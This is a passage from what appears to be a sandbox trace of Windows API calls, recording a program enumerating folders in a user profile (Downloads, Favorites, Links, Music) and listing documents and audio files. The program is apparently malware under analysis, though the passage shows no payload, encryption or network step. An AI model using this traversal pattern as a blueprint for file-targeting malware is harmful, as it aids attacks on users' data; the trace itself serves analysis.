dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SAsKqjMtaP8ZXgThhx.docx", cAlternateFileName="SASKQJ~1.DOC")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa739a030, ftCreationTime.dwHighDateTime=0x1d5b69d, ftLastAccessTime.dwLowDateTime=0x9a7ad7b0, ftLastAccessTime.dwHighDateTime=0x1d5c38b, ftLastWriteTime.dwLowDateTime=0x9a7ad7b0, ftLastWriteTime.dwHighDateTime=0x1d5c38b, nFileSizeHigh=0x0, nFileSizeLow=0xb350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uuejZ.pdf", cAlternateFileName="")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b8a050, ftCreationTime.dwHighDateTime=0x1d56b2f, ftLastAccessTime.dwLowDateTime=0xf33a34b0, ftLastAccessTime.dwHighDateTime=0x1d576f9, ftLastWriteTime.dwLowDateTime=0xf33a34b0, ftLastWriteTime.dwHighDateTime=0x1d576f9, nFileSizeHigh=0x0, nFileSizeLow=0x6db5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vm9n1b-JvhEE9EjmUe.xlsx", cAlternateFileName="VM9N1B~1.XLS")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9948a30, ftCreationTime.dwHighDateTime=0x1d5b5e0, ftLastAccessTime.dwLowDateTime=0x21a042d0, ftLastAccessTime.dwHighDateTime=0x1d5bcd3, ftLastWriteTime.dwLowDateTime=0x21a042d0, ftLastWriteTime.dwHighDateTime=0x1d5bcd3, nFileSizeHigh=0x0, nFileSizeLow=0xc4d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VQlKr6m_vK4.doc", cAlternateFileName="VQLKR6~1.DOC")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9467df90, ftCreationTime.dwHighDateTime=0x1d5bdea, ftLastAccessTime.dwLowDateTime=0x1ea7f740, ftLastAccessTime.dwHighDateTime=0x1d5c03d, ftLastWriteTime.dwLowDateTime=0x1ea7f740, ftLastWriteTime.dwHighDateTime=0x1d5c03d, nFileSizeHigh=0x0, nFileSizeLow=0x16da6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VwYs.rtf", cAlternateFileName="")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c0eeaf0, ftCreationTime.dwHighDateTime=0x1d53feb, ftLastAccessTime.dwLowDateTime=0x3e3c9ac0, ftLastAccessTime.dwHighDateTime=0x1d55d00, ftLastWriteTime.dwLowDateTime=0x3e3c9ac0, ftLastWriteTime.dwHighDateTime=0x1d55d00, nFileSizeHigh=0x0, nFileSizeLow=0x19b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wEdi.xlsx", cAlternateFileName="WEDI~1.XLS")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ce4850, ftCreationTime.dwHighDateTime=0x1d57faf, ftLastAccessTime.dwLowDateTime=0xcfd930, ftLastAccessTime.dwHighDateTime=0x1d564fe, ftLastWriteTime.dwLowDateTime=0xcfd930, ftLastWriteTime.dwHighDateTime=0x1d564fe, nFileSizeHigh=0x0, nFileSizeLow=0xd93b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xp74G9c0b92CjC.docx", cAlternateFileName="XP74G9~1.DOC")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1e23410, ftCreationTime.dwHighDateTime=0x1d5c4a4, ftLastAccessTime.dwLowDateTime=0x1843f9b0, ftLastAccessTime.dwHighDateTime=0x1d5c4f4, ftLastWriteTime.dwLowDateTime=0x1843f9b0, ftLastWriteTime.dwHighDateTime=0x1d5c4f4, nFileSizeHigh=0x0, nFileSizeLow=0x14a7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y07sKhvf19TTFsN.pptx", cAlternateFileName="Y07SKH~1.PPT")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1e23410, ftCreationTime.dwHighDateTime=0x1d5c4a4, ftLastAccessTime.dwLowDateTime=0x1843f9b0, ftLastAccessTime.dwHighDateTime=0x1d5c4f4, ftLastWriteTime.dwLowDateTime=0x1843f9b0, ftLastWriteTime.dwHighDateTime=0x1d5c4f4, nFileSizeHigh=0x0, nFileSizeLow=0x14a7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y07sKhvf19TTFsN.pptx", cAlternateFileName="Y07SKH~1.PPT")) returned 0 [0228.775] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bbd8 | out: hHeap=0x620000) returned 1 [0228.775] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.775] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0228.776] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.776] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.776] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.776] PathFindFileNameW (pszPath="") returned="" [0228.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c050 | out: hHeap=0x620000) returned 1 [0228.776] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.776] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.776] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0228.776] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bbd8 | out: hHeap=0x620000) returned 1 [0228.776] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.776] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0228.776] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.776] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.776] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.777] PathFindFileNameW (pszPath="") returned="" [0228.777] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c050 | out: hHeap=0x620000) returned 1 [0228.777] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.777] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.777] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0228.777] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0228.777] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0228.777] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0228.777] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0228.777] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bbd8 | out: hHeap=0x620000) returned 1 [0228.777] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.777] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0228.777] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.777] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.777] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.777] PathFindFileNameW (pszPath="") returned="" [0228.778] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e88 | out: hHeap=0x620000) returned 1 [0228.778] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.778] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.778] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0228.778] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0228.778] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0228.778] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0228.778] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.778] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0228.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.778] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.778] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.778] PathFindFileNameW (pszPath="") returned="" [0228.778] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0228.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bf80 | out: hHeap=0x620000) returned 1 [0228.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bbd8 | out: hHeap=0x620000) returned 1 [0228.779] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0228.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.779] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.779] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.779] PathFindFileNameW (pszPath="") returned="" [0228.779] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa384f530, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa384f530, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e88 | out: hHeap=0x620000) returned 1 [0228.779] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa384f530, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa384f530, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.779] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb9f5290, ftCreationTime.dwHighDateTime=0x1d5bf27, ftLastAccessTime.dwLowDateTime=0xae8be350, ftLastAccessTime.dwHighDateTime=0x1d5b5e1, ftLastWriteTime.dwLowDateTime=0xae8be350, ftLastWriteTime.dwHighDateTime=0x1d5b5e1, nFileSizeHigh=0x0, nFileSizeLow=0xf6a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B90i730v26RqNE.m4a", cAlternateFileName="B90I73~1.M4A")) returned 1 [0228.779] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.779] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66b4ed40, ftCreationTime.dwHighDateTime=0x1d5bc4b, ftLastAccessTime.dwLowDateTime=0xdfddbba0, ftLastAccessTime.dwHighDateTime=0x1d5c323, ftLastWriteTime.dwLowDateTime=0xdfddbba0, ftLastWriteTime.dwHighDateTime=0x1d5c323, nFileSizeHigh=0x0, nFileSizeLow=0x1875, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eAqsDlP2D0nW.m4a", cAlternateFileName="EAQSDL~1.M4A")) returned 1 [0228.779] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cda8920, ftCreationTime.dwHighDateTime=0x1d5b610, ftLastAccessTime.dwLowDateTime=0x44b04c50, ftLastAccessTime.dwHighDateTime=0x1d5bcfd, ftLastWriteTime.dwLowDateTime=0x44b04c50, ftLastWriteTime.dwHighDateTime=0x1d5bcfd, nFileSizeHigh=0x0, nFileSizeLow=0xa9a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kvDGm-aGpcHQ8p2smqpu.m4a", cAlternateFileName="KVDGM-~1.M4A")) returned 1 [0228.779] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67c59ec0, ftCreationTime.dwHighDateTime=0x1d5c342, ftLastAccessTime.dwLowDateTime=0xc1b6e0, ftLastAccessTime.dwHighDateTime=0x1d5bb0a, ftLastWriteTime.dwLowDateTime=0xc1b6e0, ftLastWriteTime.dwHighDateTime=0x1d5bb0a, nFileSizeHigh=0x0, nFileSizeLow=0x18a70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LB CSJo4-v.m4a", cAlternateFileName="LBCSJO~1.M4A")) returned 1 [0228.779] FindNextFileW (in: 